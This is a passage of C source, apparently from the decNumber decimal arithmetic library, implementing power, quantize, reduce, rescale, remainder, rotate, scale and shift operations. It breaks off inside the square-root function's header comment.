msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, ub++, uc++) { /* Unit loop */ Unit a, b; /* extract units */ if (ua>msua) a=0; else a=*ua; if (ub>msub) b=0; else b=*ub; *uc=0; /* can now write back */ if (a|b) { /* maybe 1 bits to examine */ Int i, j; /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if ((a|b)&1) *uc=*uc+(Unit)powers[i]; /* effect OR */ j=a%10; a=a/10; j|=b%10; b=b/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* non-zero */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberOr */ /* ------------------------------------------------------------------ */ /* decNumberPlus -- prefix plus operator */ /* */ /* This computes C = 0 + A */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* See also decNumberCopy for a quiet bitwise version of this. */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This simply uses AddOp; Add will take fast path after preparing A. */ /* Performance is a concern here, as this routine is often used to */ /* check operands and apply rounding and overflow/underflow testing. */ /* ------------------------------------------------------------------ */ decNumber * decNumberPlus(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dzero; uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif decNumberZero(&dzero); /* make 0 */ dzero.exponent=rhs->exponent; /* [no coefficient expansion] */ decAddOp(res, &dzero, rhs, set, 0, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberPlus */ /* ------------------------------------------------------------------ */ /* decNumberMultiply -- multiply two Numbers */ /* */ /* This computes C = A x B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X+X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberMultiply(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decMultiplyOp(res, lhs, rhs, set, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberMultiply */ /* ------------------------------------------------------------------ */ /* decNumberPower -- raise a number to a power */ /* */ /* This computes C = A ** B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X**X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* Mathematical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* */ /* However, if 1999999997<=B<=999999999 and B is an integer then the */ /* restrictions on A and the context are relaxed to the usual bounds, */ /* for compatibility with the earlier (integer power only) version */ /* of this function. */ /* */ /* When B is an integer, the result may be exact, even if rounded. */ /* */ /* The final result is rounded according to the context; it will */ /* almost always be correctly rounded, but may be up to 1 ulp in */ /* error in rare cases. */ /* ------------------------------------------------------------------ */ decNumber * decNumberPower(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif decNumber *allocdac=NULL; /* -> allocated acc buffer, iff used */ decNumber *allocinv=NULL; /* -> allocated 1/x buffer, iff used */ Int reqdigits=set->digits; /* requested DIGITS */ Int n; /* rhs in binary */ Flag rhsint=0; /* 1 if rhs is an integer */ Flag useint=0; /* 1 if can use integer calculation */ Flag isoddint=0; /* 1 if rhs is an integer and odd */ Int i; /* work */ #if DECSUBSET Int dropped; /* .. */ #endif uInt needbytes; /* buffer size needed */ Flag seenbit; /* seen a bit while powering */ Int residue=0; /* rounding residue */ uInt status=0; /* accumulators */ uByte bits=0; /* result sign if errors */ decContext aset; /* working context */ decNumber dnOne; /* work value 1... */ /* local accumulator buffer [a decNumber, with digits+elength+1 digits] */ decNumber dacbuff[D2N(DECBUFFER+9)]; decNumber *dac=dacbuff; /* -> result accumulator */ /* same again for possible 1/lhs calculation */ decNumber invbuff[D2N(DECBUFFER+9)]; #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, &status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* handle NaNs and rhs Infinity (lhs infinity is harder) */ if (SPECIALARGS) { if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) { /* NaNs */ decNaNs(res, lhs, rhs, set, &status); break;} if (decNumberIsInfinite(rhs)) { /* rhs Infinity */ Flag rhsneg=rhs->bits&DECNEG; /* save rhs sign */ if (decNumberIsNegative(lhs) /* lhs<0 */ && !decNumberIsZero(lhs)) /* .. */ status|=DEC_Invalid_operation; else { /* lhs >=0 */ decNumberZero(&dnOne); /* set up 1 */ dnOne.lsu[0]=1; decNumberCompare(dac, lhs, &dnOne, set); /* lhs ? 1 */ decNumberZero(res); /* prepare for 0/1/Infinity */ if (decNumberIsNegative(dac)) { /* lhs<1 */ if (rhsneg) res->bits|=DECINF; /* +Infinity [else is +0] */ } else if (dac->lsu[0]==0) { /* lhs=1 */ /* 1**Infinity is inexact, so return fully-padded 1.0000 */ Int shift=set->digits-1; *res->lsu=1; /* was 0, make int 1 */ res->digits=decShiftToMost(res->lsu, 1, shift); res->exponent=-shift; /* make 1.0000... */ status|=DEC_Inexact|DEC_Rounded; /* deemed inexact */ } else { /* lhs>1 */ if (!rhsneg) res->bits|=DECINF; /* +Infinity [else is +0] */ } } /* lhs>=0 */ break;} /* [lhs infinity drops through] */ } /* specials */ /* Original rhs may be an integer that fits and is in range */ n=decGetInt(rhs); if (n!=BADINT) { /* it is an integer */ rhsint=1; /* record the fact for 1**n */ isoddint=(Flag)n&1; /* [works even if big] */ if (n!=BIGEVEN && n!=BIGODD) /* can use integer path? */ useint=1; /* looks good */ } if (decNumberIsNegative(lhs) /* -x .. */ && isoddint) bits=DECNEG; /* .. to an odd power */ /* handle LHS infinity */ if (decNumberIsInfinite(lhs)) { /* [NaNs already handled] */ uByte rbits=rhs->bits; /* save */ decNumberZero(res); /* prepare */ if (n==0) *res->lsu=1; /* [-]Inf**0 => 1 */ else { /* -Inf**nonint -> error */ if (!rhsint && decNumberIsNegative(lhs)) { status|=DEC_Invalid_operation; /* -Inf**nonint is error */ break;} if (!(rbits & DECNEG)) bits|=DECINF; /* was not a **-n */ /* [otherwise will be 0 or -0] */ res->bits=bits; } break;} /* similarly handle LHS zero */ if (decNumberIsZero(lhs)) { if (n==0) { /* 0**0 => Error */ #if DECSUBSET if (!set->extended) { /* [unless subset] */ decNumberZero(res); *res->lsu=1; /* return 1 */ break;} #endif status|=DEC_Invalid_operation; } else { /* 0**x */ uByte rbits=rhs->bits; /* save */ if (rbits & DECNEG) { /* was a 0**(-n) */ #if DECSUBSET if (!set->extended) { /* [bad if subset] */ status|=DEC_Invalid_operation; break;} #endif bits|=DECINF; } decNumberZero(res); /* prepare */ /* [otherwise will be 0 or -0] */ res->bits=bits; } break;} /* here both lhs and rhs are finite; rhs==0 is handled in the */ /* integer path. Next handle the non-integer cases */ if (!useint) { /* non-integral rhs */ /* any -ve lhs is bad, as is either operand or context out of */ /* bounds */ if (decNumberIsNegative(lhs)) { status|=DEC_Invalid_operation; break;} if (decCheckMath(lhs, set, &status) || decCheckMath(rhs, set, &status)) break; /* variable status */ decContextDefault(&aset, DEC_INIT_DECIMAL64); /* clean context */ aset.emax=DEC_MAX_MATH; /* usual bounds */ aset.emin=-DEC_MAX_MATH; /* .. */ aset.clamp=0; /* and no concrete format */ /* calculate the result using exp(ln(lhs)*rhs), which can */ /* all be done into the accumulator, dac. The precision needed */ /* is enough to contain the full information in the lhs (which */ /* is the total digits, including exponent), or the requested */ /* precision, if larger, + 4; 6 is used for the exponent */ /* maximum length, and this is also used when it is shorter */ /* than the requested digits as it greatly reduces the >0.5 ulp */ /* cases at little cost (because Ln doubles digits each */ /* iteration so a few extra digits rarely causes an extra */ /* iteration) */ aset.digits=MAXI(lhs->digits, set->digits)+6+4; } /* non-integer rhs */ else { /* rhs is in-range integer */ if (n==0) { /* x**0 = 1 */ /* (0**0 was handled above) */ decNumberZero(res); /* result=1 */ *res->lsu=1; /* .. */ break;} /* rhs is a non-zero integer */ if (n<0) n=-n; /* use abs(n) */ aset=*set; /* clone the context */ aset.round=DEC_ROUND_HALF_EVEN; /* internally use balanced */ /* calculate the working DIGITS */ aset.digits=reqdigits+(rhs->digits+rhs->exponent)+2; #if DECSUBSET if (!set->extended) aset.digits--; /* use classic precision */ #endif /* it's an error if this is more than can be handled */ if (aset.digits>DECNUMMAXP) {status|=DEC_Invalid_operation; break;} } /* integer path */ /* aset.digits is the count of digits for the accumulator needed */ /* if accumulator is too long for local storage, then allocate */ needbytes=sizeof(decNumber)+(D2U(aset.digits)-1)*sizeof(Unit); /* [needbytes also used below if 1/lhs needed] */ if (needbytes>sizeof(dacbuff)) { allocdac=(decNumber *)malloc(needbytes); if (allocdac==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} dac=allocdac; /* use the allocated space */ } /* here, aset is set up and accumulator is ready for use */ if (!useint) { /* non-integral rhs */ /* x ** y; special-case x=1 here as it will otherwise always */ /* reduce to integer 1; decLnOp has a fastpath which detects */ /* the case of x=1 */ decLnOp(dac, lhs, &aset, &status); /* dac=ln(lhs) */ /* [no error possible, as lhs 0 already handled] */ if (ISZERO(dac)) { /* x==1, 1.0, etc. */ /* need to return fully-padded 1.0000 etc., but rhsint->1 */ *dac->lsu=1; /* was 0, make int 1 */ if (!rhsint) { /* add padding */ Int shift=set->digits-1; dac->digits=decShiftToMost(dac->lsu, 1, shift); dac->exponent=-shift; /* make 1.0000... */ status|=DEC_Inexact|DEC_Rounded; /* deemed inexact */ } } else { decMultiplyOp(dac, dac, rhs, &aset, &status); /* dac=dac*rhs */ decExpOp(dac, dac, &aset, &status); /* dac=exp(dac) */ } /* and drop through for final rounding */ } /* non-integer rhs */ else { /* carry on with integer */ decNumberZero(dac); /* acc=1 */ *dac->lsu=1; /* .. */ /* if a negative power the constant 1 is needed, and if not subset */ /* invert the lhs now rather than inverting the result later */ if (decNumberIsNegative(rhs)) { /* was a **-n [hence digits>0] */ decNumber *inv=invbuff; /* assume use fixed buffer */ decNumberCopy(&dnOne, dac); /* dnOne=1; [needed now or later] */ #if DECSUBSET if (set->extended) { /* need to calculate 1/lhs */ #endif /* divide lhs into 1, putting result in dac [dac=1/dac] */ decDivideOp(dac, &dnOne, lhs, &aset, DIVIDE, &status); /* now locate or allocate space for the inverted lhs */ if (needbytes>sizeof(invbuff)) { allocinv=(decNumber *)malloc(needbytes); if (allocinv==NULL) { /* hopeless -- abandon */ status|=DEC_Insufficient_storage; break;} inv=allocinv; /* use the allocated space */ } /* [inv now points to big-enough buffer or allocated storage] */ decNumberCopy(inv, dac); /* copy the 1/lhs */ decNumberCopy(dac, &dnOne); /* restore acc=1 */ lhs=inv; /* .. and go forward with new lhs */ #if DECSUBSET } #endif } /* Raise-to-the-power loop... */ seenbit=0; /* set once a 1-bit is encountered */ for (i=1;;i++){ /* for each bit [top bit ignored] */ /* abandon if had overflow or terminal underflow */ if (status & (DEC_Overflow|DEC_Underflow)) { /* interesting? */ if (status&DEC_Overflow || ISZERO(dac)) break; } /* [the following two lines revealed an optimizer bug in a C++ */ /* compiler, with symptom: 5**3 -> 25, when n=n+n was used] */ n=n<<1; /* move next bit to testable position */ if (n<0) { /* top bit is set */ seenbit=1; /* OK, significant bit seen */ decMultiplyOp(dac, dac, lhs, &aset, &status); /* dac=dac*x */ } if (i==31) break; /* that was the last bit */ if (!seenbit) continue; /* no need to square 1 */ decMultiplyOp(dac, dac, dac, &aset, &status); /* dac=dac*dac [square] */ } /*i*/ /* 32 bits */ /* complete internal overflow or underflow processing */ if (status & (DEC_Overflow|DEC_Underflow)) { #if DECSUBSET /* If subset, and power was negative, reverse the kind of -erflow */ /* [1/x not yet done] */ if (!set->extended && decNumberIsNegative(rhs)) { if (status & DEC_Overflow) status^=DEC_Overflow | DEC_Underflow | DEC_Subnormal; else { /* trickier -- Underflow may or may not be set */ status&=~(DEC_Underflow | DEC_Subnormal); /* [one or both] */ status|=DEC_Overflow; } } #endif dac->bits=(dac->bits & ~DECNEG) | bits; /* force correct sign */ /* round subnormals [to set.digits rather than aset.digits] */ /* or set overflow result similarly as required */ decFinalize(dac, set, &residue, &status); decNumberCopy(res, dac); /* copy to result (is now OK length) */ break; } #if DECSUBSET if (!set->extended && /* subset math */ decNumberIsNegative(rhs)) { /* was a **-n [hence digits>0] */ /* so divide result into 1 [dac=1/dac] */ decDivideOp(dac, &dnOne, dac, &aset, DIVIDE, &status); } #endif } /* rhs integer path */ /* reduce result to the requested length and copy to result */ decCopyFit(res, dac, set, &residue, &status); decFinish(res, set, &residue, &status); /* final cleanup */ #if DECSUBSET if (!set->extended) decTrim(res, set, 0, &dropped); /* trailing zeros */ #endif } while(0); /* end protected */ if (allocdac!=NULL) free(allocdac); /* drop any storage used */ if (allocinv!=NULL) free(allocinv); /* .. */ #if DECSUBSET if (alloclhs!=NULL) free(alloclhs); /* .. */ if (allocrhs!=NULL) free(allocrhs); /* .. */ #endif if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberPower */ /* ------------------------------------------------------------------ */ /* decNumberQuantize -- force exponent to requested value */ /* */ /* This computes C = op(A, B), where op adjusts the coefficient */ /* of C (by rounding or shifting) such that the exponent (-scale) */ /* of C has exponent of B. The numerical value of C will equal A, */ /* except for the effects of any rounding that occurred. */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the number with exponent to match */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* Unless there is an error or the result is infinite, the exponent */ /* after the operation is guaranteed to be equal to that of B. */ /* ------------------------------------------------------------------ */ decNumber * decNumberQuantize(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decQuantizeOp(res, lhs, rhs, set, 1, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberQuantize */ /* ------------------------------------------------------------------ */ /* decNumberReduce -- remove trailing zeros */ /* */ /* This computes C = 0 + A, and normalizes the result */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* Previously known as Normalize */ decNumber * decNumberNormalize(decNumber *res, const decNumber *rhs, decContext *set) { return decNumberReduce(res, rhs, set); } /* decNumberNormalize */ decNumber * decNumberReduce(decNumber *res, const decNumber *rhs, decContext *set) { #if DECSUBSET decNumber *allocrhs=NULL; /* non-NULL if rounded rhs allocated */ #endif uInt status=0; /* as usual */ Int residue=0; /* as usual */ Int dropped; /* work */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operand and set lostDigits status, as needed */ if (rhs->digits>set->digits) { allocrhs=decRoundOperand(rhs, set, &status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* Infinities copy through; NaNs need usual treatment */ if (decNumberIsNaN(rhs)) { decNaNs(res, rhs, NULL, set, &status); break; } /* reduce result to the requested length and copy to result */ decCopyFit(res, rhs, set, &residue, &status); /* copy & round */ decFinish(res, set, &residue, &status); /* cleanup/set flags */ decTrim(res, set, 1, &dropped); /* normalize in place */ } while(0); /* end protected */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* .. */ #endif if (status!=0) decStatus(res, status, set);/* then report status */ return res; } /* decNumberReduce */ /* ------------------------------------------------------------------ */ /* decNumberRescale -- force exponent to requested value */ /* */ /* This computes C = op(A, B), where op adjusts the coefficient */ /* of C (by rounding or shifting) such that the exponent (-scale) */ /* of C has the value B. The numerical value of C will equal A, */ /* except for the effects of any rounding that occurred. */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the requested exponent */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* Unless there is an error or the result is infinite, the exponent */ /* after the operation is guaranteed to be equal to B. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRescale(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decQuantizeOp(res, lhs, rhs, set, 0, &status); if (status!=0) decStatus(res, status, set); return res; } /* decNumberRescale */ /* ------------------------------------------------------------------ */ /* decNumberRemainder -- divide and return remainder */ /* */ /* This computes C = A % B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X%X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRemainder(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, REMAINDER, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberRemainder */ /* ------------------------------------------------------------------ */ /* decNumberRemainderNear -- divide and return remainder from nearest */ /* */ /* This computes C = A % B, where % is the IEEE remainder operator */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X%X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRemainderNear(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decDivideOp(res, lhs, rhs, set, REMNEAR, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberRemainderNear */ /* ------------------------------------------------------------------ */ /* decNumberRotate -- rotate the coefficient of a Number left/right */ /* */ /* This computes C = A rot B (in base ten and rotating set->digits */ /* digits). */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=XrotX) */ /* lhs is A */ /* rhs is B, the number of digits to rotate (-ve to right) */ /* set is the context */ /* */ /* The digits of the coefficient of A are rotated to the left (if B */ /* is positive) or to the right (if B is negative) without adjusting */ /* the exponent or the sign of A. If lhs->digits is less than */ /* set->digits the coefficient is padded with zeros on the left */ /* before the rotate. Any leading zeros in the result are removed */ /* as usual. */ /* */ /* B must be an integer (q=0) and in the range -set->digits through */ /* +set->digits. */ /* C must have space for set->digits digits. */ /* NaNs are propagated as usual. Infinities are unaffected (but */ /* B must be valid). No status is set unless B is invalid or an */ /* operand is an sNaN. */ /* ------------------------------------------------------------------ */ decNumber * decNumberRotate(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ Int rotate; /* rhs as an Int */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* NaNs propagate as normal */ if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) decNaNs(res, lhs, rhs, set, &status); /* rhs must be an integer */ else if (decNumberIsInfinite(rhs) || rhs->exponent!=0) status=DEC_Invalid_operation; else { /* both numeric, rhs is an integer */ rotate=decGetInt(rhs); /* [cannot fail] */ if (rotate==BADINT /* something bad .. */ || rotate==BIGODD || rotate==BIGEVEN /* .. very big .. */ || abs(rotate)>set->digits) /* .. or out of range */ status=DEC_Invalid_operation; else { /* rhs is OK */ decNumberCopy(res, lhs); /* convert -ve rotate to equivalent positive rotation */ if (rotate<0) rotate=set->digits+rotate; if (rotate!=0 && rotate!=set->digits /* zero or full rotation */ && !decNumberIsInfinite(res)) { /* lhs was infinite */ /* left-rotate to do; 0 < rotate < set->digits */ uInt units, shift; /* work */ uInt msudigits; /* digits in result msu */ Unit *msu=res->lsu+D2U(res->digits)-1; /* current msu */ Unit *msumax=res->lsu+D2U(set->digits)-1; /* rotation msu */ for (msu++; msu<=msumax; msu++) *msu=0; /* ensure high units=0 */ res->digits=set->digits; /* now full-length */ msudigits=MSUDIGITS(res->digits); /* actual digits in msu */ /* rotation here is done in-place, in three steps */ /* 1. shift all to least up to one unit to unit-align final */ /* lsd [any digits shifted out are rotated to the left, */ /* abutted to the original msd (which may require split)] */ /* */ /* [if there are no whole units left to rotate, the */ /* rotation is now complete] */ /* */ /* 2. shift to least, from below the split point only, so that */ /* the final msd is in the right place in its Unit [any */ /* digits shifted out will fit exactly in the current msu, */ /* left aligned, no split required] */ /* */ /* 3. rotate all the units by reversing left part, right */ /* part, and then whole */ /* */ /* example: rotate right 8 digits (2 units + 2), DECDPUN=3. */ /* */ /* start: 00a bcd efg hij klm npq */ /* */ /* 1a 000 0ab cde fgh|ijk lmn [pq saved] */ /* 1b 00p qab cde fgh|ijk lmn */ /* */ /* 2a 00p qab cde fgh|00i jkl [mn saved] */ /* 2b mnp qab cde fgh|00i jkl */ /* */ /* 3a fgh cde qab mnp|00i jkl */ /* 3b fgh cde qab mnp|jkl 00i */ /* 3c 00i jkl mnp qab cde fgh */ /* Step 1: amount to shift is the partial right-rotate count */ rotate=set->digits-rotate; /* make it right-rotate */ units=rotate/DECDPUN; /* whole units to rotate */ shift=rotate%DECDPUN; /* left-over digits count */ if (shift>0) { /* not an exact number of units */ uInt save=res->lsu[0]%powers[shift]; /* save low digit(s) */ decShiftToLeast(res->lsu, D2U(res->digits), shift); if (shift>msudigits) { /* msumax-1 needs >0 digits */ uInt rem=save%powers[shift-msudigits];/* split save */ *msumax=(Unit)(save/powers[shift-msudigits]); /* and insert */ *(msumax-1)=*(msumax-1) +(Unit)(rem*powers[DECDPUN-(shift-msudigits)]); /* .. */ } else { /* all fits in msumax */ *msumax=*msumax+(Unit)(save*powers[msudigits-shift]); /* [maybe *1] */ } } /* digits shift needed */ /* If whole units to rotate... */ if (units>0) { /* some to do */ /* Step 2: the units to touch are the whole ones in rotate, */ /* if any, and the shift is DECDPUN-msudigits (which may be */ /* 0, again) */ shift=DECDPUN-msudigits; if (shift>0) { /* not an exact number of units */ uInt save=res->lsu[0]%powers[shift]; /* save low digit(s) */ decShiftToLeast(res->lsu, units, shift); *msumax=*msumax+(Unit)(save*powers[msudigits]); } /* partial shift needed */ /* Step 3: rotate the units array using triple reverse */ /* (reversing is easy and fast) */ decReverse(res->lsu+units, msumax); /* left part */ decReverse(res->lsu, res->lsu+units-1); /* right part */ decReverse(res->lsu, msumax); /* whole */ } /* whole units to rotate */ /* the rotation may have left an undetermined number of zeros */ /* on the left, so true length needs to be calculated */ res->digits=decGetDigits(res->lsu, msumax-res->lsu+1); } /* rotate needed */ } /* rhs OK */ } /* numerics */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberRotate */ /* ------------------------------------------------------------------ */ /* decNumberSameQuantum -- test for equal exponents */ /* */ /* res is the result number, which will contain either 0 or 1 */ /* lhs is a number to test */ /* rhs is the second (usually a pattern) */ /* */ /* No errors are possible and no context is needed. */ /* ------------------------------------------------------------------ */ decNumber * decNumberSameQuantum(decNumber *res, const decNumber *lhs, const decNumber *rhs) { Unit ret=0; /* return value */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, DECUNCONT)) return res; #endif if (SPECIALARGS) { if (decNumberIsNaN(lhs) && decNumberIsNaN(rhs)) ret=1; else if (decNumberIsInfinite(lhs) && decNumberIsInfinite(rhs)) ret=1; /* [anything else with a special gives 0] */ } else if (lhs->exponent==rhs->exponent) ret=1; decNumberZero(res); /* OK to overwrite an operand now */ *res->lsu=ret; return res; } /* decNumberSameQuantum */ /* ------------------------------------------------------------------ */ /* decNumberScaleB -- multiply by a power of 10 */ /* */ /* This computes C = A x 10**B where B is an integer (q=0) with */ /* maximum magnitude 2*(emax+digits) */ /* */ /* res is C, the result. C may be A or B */ /* lhs is A, the number to adjust */ /* rhs is B, the requested power of ten to use */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* */ /* The result may underflow or overflow. */ /* ------------------------------------------------------------------ */ decNumber * decNumberScaleB(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { Int reqexp; /* requested exponent change [B] */ uInt status=0; /* accumulator */ Int residue; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* Handle special values except lhs infinite */ if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) decNaNs(res, lhs, rhs, set, &status); /* rhs must be an integer */ else if (decNumberIsInfinite(rhs) || rhs->exponent!=0) status=DEC_Invalid_operation; else { /* lhs is a number; rhs is a finite with q==0 */ reqexp=decGetInt(rhs); /* [cannot fail] */ if (reqexp==BADINT /* something bad .. */ || reqexp==BIGODD || reqexp==BIGEVEN /* .. very big .. */ || abs(reqexp)>(2*(set->digits+set->emax))) /* .. or out of range */ status=DEC_Invalid_operation; else { /* rhs is OK */ decNumberCopy(res, lhs); /* all done if infinite lhs */ if (!decNumberIsInfinite(res)) { /* prepare to scale */ res->exponent+=reqexp; /* adjust the exponent */ residue=0; decFinalize(res, set, &residue, &status); /* .. and check */ } /* finite LHS */ } /* rhs OK */ } /* rhs finite */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberScaleB */ /* ------------------------------------------------------------------ */ /* decNumberShift -- shift the coefficient of a Number left or right */ /* */ /* This computes C = A << B or C = A >> -B (in base ten). */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X<<X) */ /* lhs is A */ /* rhs is B, the number of digits to shift (-ve to right) */ /* set is the context */ /* */ /* The digits of the coefficient of A are shifted to the left (if B */ /* is positive) or to the right (if B is negative) without adjusting */ /* the exponent or the sign of A. */ /* */ /* B must be an integer (q=0) and in the range -set->digits through */ /* +set->digits. */ /* C must have space for set->digits digits. */ /* NaNs are propagated as usual. Infinities are unaffected (but */ /* B must be valid). No status is set unless B is invalid or an */ /* operand is an sNaN. */ /* ------------------------------------------------------------------ */ decNumber * decNumberShift(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ Int shift; /* rhs as an Int */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif /* NaNs propagate as normal */ if (decNumberIsNaN(lhs) || decNumberIsNaN(rhs)) decNaNs(res, lhs, rhs, set, &status); /* rhs must be an integer */ else if (decNumberIsInfinite(rhs) || rhs->exponent!=0) status=DEC_Invalid_operation; else { /* both numeric, rhs is an integer */ shift=decGetInt(rhs); /* [cannot fail] */ if (shift==BADINT /* something bad .. */ || shift==BIGODD || shift==BIGEVEN /* .. very big .. */ || abs(shift)>set->digits) /* .. or out of range */ status=DEC_Invalid_operation; else { /* rhs is OK */ decNumberCopy(res, lhs); if (shift!=0 && !decNumberIsInfinite(res)) { /* something to do */ if (shift>0) { /* to left */ if (shift==set->digits) { /* removing all */ *res->lsu=0; /* so place 0 */ res->digits=1; /* .. */ } else { /* */ /* first remove leading digits if necessary */ if (res->digits+shift>set->digits) { decDecap(res, res->digits+shift-set->digits); /* that updated res->digits; may have gone to 1 (for a */ /* single digit or for zero */ } if (res->digits>1 || *res->lsu) /* if non-zero.. */ res->digits=decShiftToMost(res->lsu, res->digits, shift); } /* partial left */ } /* left */ else { /* to right */ if (-shift>=res->digits) { /* discarding all */ *res->lsu=0; /* so place 0 */ res->digits=1; /* .. */ } else { decShiftToLeast(res->lsu, D2U(res->digits), -shift); res->digits-=(-shift); } } /* to right */ } /* non-0 non-Inf shift */ } /* rhs OK */ } /* numerics */ if (status!=0) decStatus(res, status, set); return res; } /* decNumberShift */ /* ------------------------------------------------------------------ */ /* decNumberSquareRoot -- square root operator */ /* */ /* This computes C = squareroot(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* set is the context; note that rounding mode has no effect */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ /* This uses the following varying-precision algorithm in: */ /* */ /* Properly Rounded Variable Precision Square Root, T. E. Hull and */ /* A. Abrham, ACM Transactions on Mathematical Software, Vol 11 #3, */ /* pp229-237, ACM, September 1985. */ /* */ /* The square-root is calculated using Newton's method, after which */ /* a check is made to ensure the result is correctly rounded. */ /* */ /* % [Reformatted original Numerical Turing source code follows.] */ /* function sqrt(x : real) : real */ /* % sqrt(x) returns the properly rounded approximation to the square */ /* % root of x, in the precision of the calling environment, or it */ /* % fails if x < 0. */ /* % t e hull and a abrham, august, 1984 */ /* if x <= 0 then */ /* if x < 0 then */ /* assert false */ /* else */ /* result 0 */ /* end if */ /* end if */ /* var f := setexp(x, 0) % fraction part of x [0.1 <= x < 1] */ /* var e := getexp(x) % exponent part of x */ /* var approx : real */ /* if e mod 2 = 0 then */ /* approx := .259 + .819 * f % approx to root of f */ /* else */ /* f := f/l0 % adjustments */ /* e := e + 1 % for odd */ /* approx := .0819 + 2.59 * f % exponent */ /* end if */ /* */ /* var p:= 3 */ /* const maxp := currentprecision + 2 */ /* loop */ /* p := min(2*p - 2, maxp) % p = 4,6,10, . . . , maxp */ /* precision p */ /* approx := .5 * (approx + f/approx) */ /* exit when p = maxp */ /* end loop */ /* */ /* % approx is now within 1 ulp of the properly rounded square root */ /* % of f; to ensure proper rounding, compare squares of (approx - */ /* % l/2 ulp) and (approx + l/2 ulp) with f. */ /* p := currentprecision */ /* begin */ /* precision p + 2 */ /* const approxsubhalf := approx - setexp(.5, -p) */ /* if mulru(approxsubhalf, approxsubhalf) > f then */ /* approx := approx - setexp(.l, -p + 1) */ /* else 